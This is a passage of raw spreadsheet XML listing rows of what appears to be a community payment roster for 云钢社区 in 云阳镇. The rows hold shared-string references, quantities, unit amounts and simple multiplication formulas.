        <v>4533</v>
      </c>
      <c r="F1695" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1695" s="14">
        <v>2</v>
      </c>
      <c r="H1695" s="14">
        <v>300</v>
      </c>
      <c r="I1695" s="14">
        <f t="shared" si="89"/>
        <v>600</v>
      </c>
      <c r="J1695" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1695" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1696" ht="23" customHeight="1" spans="1:11">
      <c r="A1696" s="13" t="s">
        <v>4534</v>
      </c>
      <c r="B1696" s="14" t="str">
        <f>B1695</f>
        <v>云阳镇</v>
      </c>
      <c r="C1696" s="14" t="str">
        <f>C1695</f>
        <v>云钢社区</v>
      </c>
      <c r="D1696" s="46" t="s">
        <v>4535</v>
      </c>
      <c r="E1696" s="46" t="s">
        <v>4536</v>
      </c>
      <c r="F1696" s="14" t="str">
        <f>F1695</f>
        <v>4113210599</v>
      </c>
      <c r="G1696" s="14"/>
      <c r="H1696" s="14"/>
      <c r="I1696" s="14"/>
      <c r="J1696" s="14"/>
      <c r="K1696" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1697" ht="23" customHeight="1" spans="1:11">
      <c r="A1697" s="13" t="s">
        <v>4537</v>
      </c>
      <c r="B1697" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1697" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1697" s="14" t="s">
        <v>4538</v>
      </c>
      <c r="E1697" s="14" t="s">
        <v>4539</v>
      </c>
      <c r="F1697" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1697" s="14">
        <v>1</v>
      </c>
      <c r="H1697" s="14">
        <v>340</v>
      </c>
      <c r="I1697" s="14">
        <f t="shared" ref="I1697:I1704" si="90">H1697*G1697</f>
        <v>340</v>
      </c>
      <c r="J1697" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1697" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1698" ht="23" customHeight="1" spans="1:11">
      <c r="A1698" s="13" t="s">
        <v>4540</v>
      </c>
      <c r="B1698" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1698" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1698" s="14" t="s">
        <v>4541</v>
      </c>
      <c r="E1698" s="14" t="s">
        <v>4542</v>
      </c>
      <c r="F1698" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1698" s="14">
        <v>1</v>
      </c>
      <c r="H1698" s="14">
        <v>340</v>
      </c>
      <c r="I1698" s="14">
        <f t="shared" si="90"/>
        <v>340</v>
      </c>
      <c r="J1698" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1698" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1699" ht="23" customHeight="1" spans="1:11">
      <c r="A1699" s="13" t="s">
        <v>4543</v>
      </c>
      <c r="B1699" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1699" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1699" s="14" t="s">
        <v>4544</v>
      </c>
      <c r="E1699" s="14" t="s">
        <v>3706</v>
      </c>
      <c r="F1699" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1699" s="14">
        <v>1</v>
      </c>
      <c r="H1699" s="14">
        <v>340</v>
      </c>
      <c r="I1699" s="14">
        <f t="shared" si="90"/>
        <v>340</v>
      </c>
      <c r="J1699" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1699" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1700" ht="23" customHeight="1" spans="1:11">
      <c r="A1700" s="13" t="s">
        <v>4545</v>
      </c>
      <c r="B1700" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1700" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1700" s="14" t="s">
        <v>4546</v>
      </c>
      <c r="E1700" s="14" t="s">
        <v>4077</v>
      </c>
      <c r="F1700" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1700" s="14">
        <v>1</v>
      </c>
      <c r="H1700" s="14">
        <v>340</v>
      </c>
      <c r="I1700" s="14">
        <f t="shared" si="90"/>
        <v>340</v>
      </c>
      <c r="J1700" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1700" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1701" ht="23" customHeight="1" spans="1:11">
      <c r="A1701" s="13" t="s">
        <v>4547</v>
      </c>
      <c r="B1701" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1701" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1701" s="14" t="s">
        <v>4548</v>
      </c>
      <c r="E1701" s="14" t="s">
        <v>786</v>
      </c>
      <c r="F1701" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1701" s="14">
        <v>1</v>
      </c>
      <c r="H1701" s="14">
        <v>340</v>
      </c>
      <c r="I1701" s="14">
        <f t="shared" si="90"/>
        <v>340</v>
      </c>
      <c r="J1701" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1701" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1702" ht="23" customHeight="1" spans="1:11">
      <c r="A1702" s="13" t="s">
        <v>4549</v>
      </c>
      <c r="B1702" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1702" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1702" s="14" t="s">
        <v>4550</v>
      </c>
      <c r="E1702" s="14" t="s">
        <v>4551</v>
      </c>
      <c r="F1702" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1702" s="14">
        <v>1</v>
      </c>
      <c r="H1702" s="14">
        <v>340</v>
      </c>
      <c r="I1702" s="14">
        <f t="shared" si="90"/>
        <v>340</v>
      </c>
      <c r="J1702" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1702" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1703" ht="23" customHeight="1" spans="1:11">
      <c r="A1703" s="13" t="s">
        <v>4552</v>
      </c>
      <c r="B1703" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1703" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1703" s="14" t="s">
        <v>4553</v>
      </c>
      <c r="E1703" s="14" t="s">
        <v>3716</v>
      </c>
      <c r="F1703" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1703" s="14">
        <v>2</v>
      </c>
      <c r="H1703" s="14">
        <v>300</v>
      </c>
      <c r="I1703" s="14">
        <f t="shared" si="90"/>
        <v>600</v>
      </c>
      <c r="J1703" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1703" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1704" ht="23" customHeight="1" spans="1:11">
      <c r="A1704" s="13" t="s">
        <v>4554</v>
      </c>
      <c r="B1704" s="14" t="str">
        <f>B1703</f>
        <v>云阳镇</v>
      </c>
      <c r="C1704" s="14" t="str">
        <f>C1703</f>
        <v>云钢社区</v>
      </c>
      <c r="D1704" s="46" t="s">
        <v>4555</v>
      </c>
      <c r="E1704" s="46" t="s">
        <v>4556</v>
      </c>
      <c r="F1704" s="14" t="str">
        <f>F1703</f>
        <v>4113210599</v>
      </c>
      <c r="G1704" s="14"/>
      <c r="H1704" s="14"/>
      <c r="I1704" s="14"/>
      <c r="J1704" s="14"/>
      <c r="K1704" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1705" ht="23" customHeight="1" spans="1:11">
      <c r="A1705" s="13" t="s">
        <v>4557</v>
      </c>
      <c r="B1705" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1705" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1705" s="14" t="s">
        <v>4558</v>
      </c>
      <c r="E1705" s="14" t="s">
        <v>4490</v>
      </c>
      <c r="F1705" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1705" s="14">
        <v>1</v>
      </c>
      <c r="H1705" s="14">
        <v>340</v>
      </c>
      <c r="I1705" s="14">
        <f t="shared" ref="I1705:I1714" si="91">H1705*G1705</f>
        <v>340</v>
      </c>
      <c r="J1705" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1705" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1706" ht="23" customHeight="1" spans="1:11">
      <c r="A1706" s="13" t="s">
        <v>4559</v>
      </c>
      <c r="B1706" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1706" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1706" s="14" t="s">
        <v>4560</v>
      </c>
      <c r="E1706" s="14" t="s">
        <v>4016</v>
      </c>
      <c r="F1706" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1706" s="14">
        <v>1</v>
      </c>
      <c r="H1706" s="14">
        <v>340</v>
      </c>
      <c r="I1706" s="14">
        <f t="shared" si="91"/>
        <v>340</v>
      </c>
      <c r="J1706" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1706" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1707" ht="23" customHeight="1" spans="1:11">
      <c r="A1707" s="13" t="s">
        <v>4561</v>
      </c>
      <c r="B1707" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1707" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1707" s="14" t="s">
        <v>4562</v>
      </c>
      <c r="E1707" s="14" t="s">
        <v>3972</v>
      </c>
      <c r="F1707" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1707" s="14">
        <v>1</v>
      </c>
      <c r="H1707" s="14">
        <v>340</v>
      </c>
      <c r="I1707" s="14">
        <f t="shared" si="91"/>
        <v>340</v>
      </c>
      <c r="J1707" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1707" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1708" ht="23" customHeight="1" spans="1:11">
      <c r="A1708" s="13" t="s">
        <v>4563</v>
      </c>
      <c r="B1708" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1708" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1708" s="14" t="s">
        <v>4196</v>
      </c>
      <c r="E1708" s="14" t="s">
        <v>3802</v>
      </c>
      <c r="F1708" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1708" s="14">
        <v>1</v>
      </c>
      <c r="H1708" s="14">
        <v>340</v>
      </c>
      <c r="I1708" s="14">
        <f t="shared" si="91"/>
        <v>340</v>
      </c>
      <c r="J1708" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1708" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1709" ht="23" customHeight="1" spans="1:11">
      <c r="A1709" s="13" t="s">
        <v>4564</v>
      </c>
      <c r="B1709" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1709" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1709" s="14" t="s">
        <v>4565</v>
      </c>
      <c r="E1709" s="14" t="s">
        <v>4566</v>
      </c>
      <c r="F1709" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1709" s="14">
        <v>1</v>
      </c>
      <c r="H1709" s="14">
        <v>340</v>
      </c>
      <c r="I1709" s="14">
        <f t="shared" si="91"/>
        <v>340</v>
      </c>
      <c r="J1709" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1709" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1710" ht="23" customHeight="1" spans="1:11">
      <c r="A1710" s="13" t="s">
        <v>4567</v>
      </c>
      <c r="B1710" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1710" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1710" s="14" t="s">
        <v>4568</v>
      </c>
      <c r="E1710" s="14" t="s">
        <v>2560</v>
      </c>
      <c r="F1710" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1710" s="14">
        <v>1</v>
      </c>
      <c r="H1710" s="14">
        <v>340</v>
      </c>
      <c r="I1710" s="14">
        <f t="shared" si="91"/>
        <v>340</v>
      </c>
      <c r="J1710" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1710" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1711" ht="23" customHeight="1" spans="1:11">
      <c r="A1711" s="13" t="s">
        <v>4569</v>
      </c>
      <c r="B1711" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1711" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1711" s="14" t="s">
        <v>4570</v>
      </c>
      <c r="E1711" s="14" t="s">
        <v>4571</v>
      </c>
      <c r="F1711" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1711" s="14">
        <v>1</v>
      </c>
      <c r="H1711" s="14">
        <v>340</v>
      </c>
      <c r="I1711" s="14">
        <f t="shared" si="91"/>
        <v>340</v>
      </c>
      <c r="J1711" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1711" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1712" ht="23" customHeight="1" spans="1:11">
      <c r="A1712" s="13" t="s">
        <v>4572</v>
      </c>
      <c r="B1712" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1712" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1712" s="14" t="s">
        <v>4573</v>
      </c>
      <c r="E1712" s="14" t="s">
        <v>4574</v>
      </c>
      <c r="F1712" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1712" s="14">
        <v>1</v>
      </c>
      <c r="H1712" s="14">
        <v>340</v>
      </c>
      <c r="I1712" s="14">
        <f t="shared" si="91"/>
        <v>340</v>
      </c>
      <c r="J1712" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1712" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1713" ht="23" customHeight="1" spans="1:11">
      <c r="A1713" s="13" t="s">
        <v>4575</v>
      </c>
      <c r="B1713" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1713" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1713" s="14" t="s">
        <v>4576</v>
      </c>
      <c r="E1713" s="14" t="s">
        <v>4391</v>
      </c>
      <c r="F1713" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1713" s="14">
        <v>1</v>
      </c>
      <c r="H1713" s="14">
        <v>340</v>
      </c>
      <c r="I1713" s="14">
        <f t="shared" si="91"/>
        <v>340</v>
      </c>
      <c r="J1713" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1713" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1714" ht="23" customHeight="1" spans="1:11">
      <c r="A1714" s="13" t="s">
        <v>4577</v>
      </c>
      <c r="B1714" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1714" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1714" s="14" t="s">
        <v>4578</v>
      </c>
      <c r="E1714" s="14" t="s">
        <v>3829</v>
      </c>
      <c r="F1714" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1714" s="14">
        <v>2</v>
      </c>
      <c r="H1714" s="14">
        <v>300</v>
      </c>
      <c r="I1714" s="14">
        <f t="shared" si="91"/>
        <v>600</v>
      </c>
      <c r="J1714" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1714" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1715" ht="23" customHeight="1" spans="1:11">
      <c r="A1715" s="13" t="s">
        <v>4579</v>
      </c>
      <c r="B1715" s="14" t="str">
        <f>B1714</f>
        <v>云阳镇</v>
      </c>
      <c r="C1715" s="14" t="str">
        <f>C1714</f>
        <v>云钢社区</v>
      </c>
      <c r="D1715" s="46" t="s">
        <v>4580</v>
      </c>
      <c r="E1715" s="27" t="s">
        <v>3805</v>
      </c>
      <c r="F1715" s="14" t="str">
        <f>F1714</f>
        <v>4113210599</v>
      </c>
      <c r="G1715" s="14"/>
      <c r="H1715" s="14"/>
      <c r="I1715" s="14"/>
      <c r="J1715" s="14"/>
      <c r="K1715" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1716" ht="23" customHeight="1" spans="1:11">
      <c r="A1716" s="13" t="s">
        <v>4581</v>
      </c>
      <c r="B1716" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1716" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1716" s="14" t="s">
        <v>4582</v>
      </c>
      <c r="E1716" s="14" t="s">
        <v>3841</v>
      </c>
      <c r="F1716" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1716" s="14">
        <v>3</v>
      </c>
      <c r="H1716" s="14">
        <v>265</v>
      </c>
      <c r="I1716" s="14">
        <f>H1716*G1716</f>
        <v>795</v>
      </c>
      <c r="J1716" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1716" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1717" ht="23" customHeight="1" spans="1:11">
      <c r="A1717" s="13" t="s">
        <v>4583</v>
      </c>
      <c r="B1717" s="14" t="str">
        <f>B1716</f>
        <v>云阳镇</v>
      </c>
      <c r="C1717" s="14" t="str">
        <f>C1716</f>
        <v>云钢社区</v>
      </c>
      <c r="D1717" s="46" t="s">
        <v>4584</v>
      </c>
      <c r="E1717" s="27" t="s">
        <v>4585</v>
      </c>
      <c r="F1717" s="14" t="str">
        <f>F1716</f>
        <v>4113210599</v>
      </c>
      <c r="G1717" s="14"/>
      <c r="H1717" s="14"/>
      <c r="I1717" s="14"/>
      <c r="J1717" s="14"/>
      <c r="K1717" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1718" ht="23" customHeight="1" spans="1:11">
      <c r="A1718" s="13" t="s">
        <v>4586</v>
      </c>
      <c r="B1718" s="14" t="str">
        <f>B1717</f>
        <v>云阳镇</v>
      </c>
      <c r="C1718" s="14" t="str">
        <f>C1717</f>
        <v>云钢社区</v>
      </c>
      <c r="D1718" s="46" t="s">
        <v>4587</v>
      </c>
      <c r="E1718" s="46" t="s">
        <v>4588</v>
      </c>
      <c r="F1718" s="14" t="str">
        <f>F1717</f>
        <v>4113210599</v>
      </c>
      <c r="G1718" s="14"/>
      <c r="H1718" s="14"/>
      <c r="I1718" s="14"/>
      <c r="J1718" s="14"/>
      <c r="K1718" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1719" ht="23" customHeight="1" spans="1:11">
      <c r="A1719" s="13" t="s">
        <v>4589</v>
      </c>
      <c r="B1719" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1719" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1719" s="14" t="s">
        <v>4590</v>
      </c>
      <c r="E1719" s="14" t="s">
        <v>3923</v>
      </c>
      <c r="F1719" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1719" s="14">
        <v>1</v>
      </c>
      <c r="H1719" s="14">
        <v>340</v>
      </c>
      <c r="I1719" s="14">
        <f>H1719*G1719</f>
        <v>340</v>
      </c>
      <c r="J1719" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1719" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1720" ht="23" customHeight="1" spans="1:11">
      <c r="A1720" s="13" t="s">
        <v>4591</v>
      </c>
      <c r="B1720" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1720" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1720" s="14" t="s">
        <v>4592</v>
      </c>
      <c r="E1720" s="14" t="s">
        <v>4593</v>
      </c>
      <c r="F1720" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1720" s="14">
        <v>1</v>
      </c>
      <c r="H1720" s="14">
        <v>340</v>
      </c>
      <c r="I1720" s="14">
        <f>H1720*G1720</f>
        <v>340</v>
      </c>
      <c r="J1720" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1720" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1721" ht="23" customHeight="1" spans="1:11">
      <c r="A1721" s="13" t="s">
        <v>4594</v>
      </c>
      <c r="B1721" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1721" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1721" s="14" t="s">
        <v>4595</v>
      </c>
      <c r="E1721" s="14" t="s">
        <v>3975</v>
      </c>
      <c r="F1721" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1721" s="14">
        <v>2</v>
      </c>
      <c r="H1721" s="14">
        <v>300</v>
      </c>
      <c r="I1721" s="14">
        <f>H1721*G1721</f>
        <v>600</v>
      </c>
      <c r="J1721" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1721" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1722" ht="23" customHeight="1" spans="1:11">
      <c r="A1722" s="13" t="s">
        <v>4596</v>
      </c>
      <c r="B1722" s="14" t="str">
        <f>B1721</f>
        <v>云阳镇</v>
      </c>
      <c r="C1722" s="14" t="str">
        <f>C1721</f>
        <v>云钢社区</v>
      </c>
      <c r="D1722" s="46" t="s">
        <v>4597</v>
      </c>
      <c r="E1722" s="27" t="s">
        <v>3692</v>
      </c>
      <c r="F1722" s="14" t="str">
        <f>F1721</f>
        <v>4113210599</v>
      </c>
      <c r="G1722" s="14"/>
      <c r="H1722" s="14"/>
      <c r="I1722" s="14"/>
      <c r="J1722" s="14"/>
      <c r="K1722" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1723" ht="23" customHeight="1" spans="1:11">
      <c r="A1723" s="13" t="s">
        <v>4598</v>
      </c>
      <c r="B1723" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1723" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1723" s="14" t="s">
        <v>4599</v>
      </c>
      <c r="E1723" s="14" t="s">
        <v>4600</v>
      </c>
      <c r="F1723" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1723" s="14">
        <v>1</v>
      </c>
      <c r="H1723" s="14">
        <v>340</v>
      </c>
      <c r="I1723" s="14">
        <f>H1723*G1723</f>
        <v>340</v>
      </c>
      <c r="J1723" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1723" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1724" ht="23" customHeight="1" spans="1:11">
      <c r="A1724" s="13" t="s">
        <v>4601</v>
      </c>
      <c r="B1724" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1724" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1724" s="14" t="s">
        <v>4602</v>
      </c>
      <c r="E1724" s="14" t="s">
        <v>4603</v>
      </c>
      <c r="F1724" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1724" s="14">
        <v>1</v>
      </c>
      <c r="H1724" s="14">
        <v>340</v>
      </c>
      <c r="I1724" s="14">
        <f>H1724*G1724</f>
        <v>340</v>
      </c>
      <c r="J1724" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1724" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1725" ht="23" customHeight="1" spans="1:11">
      <c r="A1725" s="13" t="s">
        <v>4604</v>
      </c>
      <c r="B1725" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1725" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1725" s="14" t="s">
        <v>4605</v>
      </c>
      <c r="E1725" s="14" t="s">
        <v>4606</v>
      </c>
      <c r="F1725" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1725" s="14">
        <v>2</v>
      </c>
      <c r="H1725" s="14">
        <v>300</v>
      </c>
      <c r="I1725" s="14">
        <f>H1725*G1725</f>
        <v>600</v>
      </c>
      <c r="J1725" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1725" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1726" ht="23" customHeight="1" spans="1:11">
      <c r="A1726" s="13" t="s">
        <v>4607</v>
      </c>
      <c r="B1726" s="14" t="str">
        <f>B1725</f>
        <v>云阳镇</v>
      </c>
      <c r="C1726" s="14" t="str">
        <f>C1725</f>
        <v>云钢社区</v>
      </c>
      <c r="D1726" s="46" t="s">
        <v>4608</v>
      </c>
      <c r="E1726" s="46" t="s">
        <v>4609</v>
      </c>
      <c r="F1726" s="14" t="str">
        <f>F1725</f>
        <v>4113210599</v>
      </c>
      <c r="G1726" s="14"/>
      <c r="H1726" s="14"/>
      <c r="I1726" s="14"/>
      <c r="J1726" s="14"/>
      <c r="K1726" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1727" ht="23" customHeight="1" spans="1:11">
      <c r="A1727" s="13" t="s">
        <v>4610</v>
      </c>
      <c r="B1727" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1727" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1727" s="14" t="s">
        <v>4611</v>
      </c>
      <c r="E1727" s="14" t="s">
        <v>1160</v>
      </c>
      <c r="F1727" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1727" s="14">
        <v>1</v>
      </c>
      <c r="H1727" s="14">
        <v>340</v>
      </c>
      <c r="I1727" s="14">
        <f t="shared" ref="I1727:I1735" si="92">H1727*G1727</f>
        <v>340</v>
      </c>
      <c r="J1727" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1727" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1728" ht="23" customHeight="1" spans="1:11">
      <c r="A1728" s="13" t="s">
        <v>4612</v>
      </c>
      <c r="B1728" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1728" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1728" s="14" t="s">
        <v>4613</v>
      </c>
      <c r="E1728" s="14" t="s">
        <v>4614</v>
      </c>
      <c r="F1728" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1728" s="14">
        <v>1</v>
      </c>
      <c r="H1728" s="14">
        <v>340</v>
      </c>
      <c r="I1728" s="14">
        <f t="shared" si="92"/>
        <v>340</v>
      </c>
      <c r="J1728" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1728" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1729" ht="23" customHeight="1" spans="1:11">
      <c r="A1729" s="13" t="s">
        <v>4615</v>
      </c>
      <c r="B1729" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1729" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1729" s="14" t="s">
        <v>4616</v>
      </c>
      <c r="E1729" s="14" t="s">
        <v>4617</v>
      </c>
      <c r="F1729" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1729" s="14">
        <v>1</v>
      </c>
      <c r="H1729" s="14">
        <v>340</v>
      </c>
      <c r="I1729" s="14">
        <f t="shared" si="92"/>
        <v>340</v>
      </c>
      <c r="J1729" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1729" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1730" ht="23" customHeight="1" spans="1:11">
      <c r="A1730" s="13" t="s">
        <v>4618</v>
      </c>
      <c r="B1730" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1730" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1730" s="14" t="s">
        <v>4619</v>
      </c>
      <c r="E1730" s="14" t="s">
        <v>3706</v>
      </c>
      <c r="F1730" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1730" s="14">
        <v>1</v>
      </c>
      <c r="H1730" s="14">
        <v>340</v>
      </c>
      <c r="I1730" s="14">
        <f t="shared" si="92"/>
        <v>340</v>
      </c>
      <c r="J1730" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1730" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1731" ht="23" customHeight="1" spans="1:11">
      <c r="A1731" s="13" t="s">
        <v>4620</v>
      </c>
      <c r="B1731" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1731" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1731" s="14" t="s">
        <v>4621</v>
      </c>
      <c r="E1731" s="14" t="s">
        <v>4622</v>
      </c>
      <c r="F1731" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1731" s="14">
        <v>1</v>
      </c>
      <c r="H1731" s="14">
        <v>340</v>
      </c>
      <c r="I1731" s="14">
        <f t="shared" si="92"/>
        <v>340</v>
      </c>
      <c r="J1731" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1731" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1732" ht="23" customHeight="1" spans="1:11">
      <c r="A1732" s="13" t="s">
        <v>4623</v>
      </c>
      <c r="B1732" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1732" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1732" s="14" t="s">
        <v>4624</v>
      </c>
      <c r="E1732" s="14" t="s">
        <v>4077</v>
      </c>
      <c r="F1732" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1732" s="14">
        <v>1</v>
      </c>
      <c r="H1732" s="14">
        <v>340</v>
      </c>
      <c r="I1732" s="14">
        <f t="shared" si="92"/>
        <v>340</v>
      </c>
      <c r="J1732" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1732" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1733" ht="23" customHeight="1" spans="1:11">
      <c r="A1733" s="13" t="s">
        <v>4625</v>
      </c>
      <c r="B1733" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1733" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1733" s="14" t="s">
        <v>4626</v>
      </c>
      <c r="E1733" s="14" t="s">
        <v>4627</v>
      </c>
      <c r="F1733" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1733" s="14">
        <v>1</v>
      </c>
      <c r="H1733" s="14">
        <v>340</v>
      </c>
      <c r="I1733" s="14">
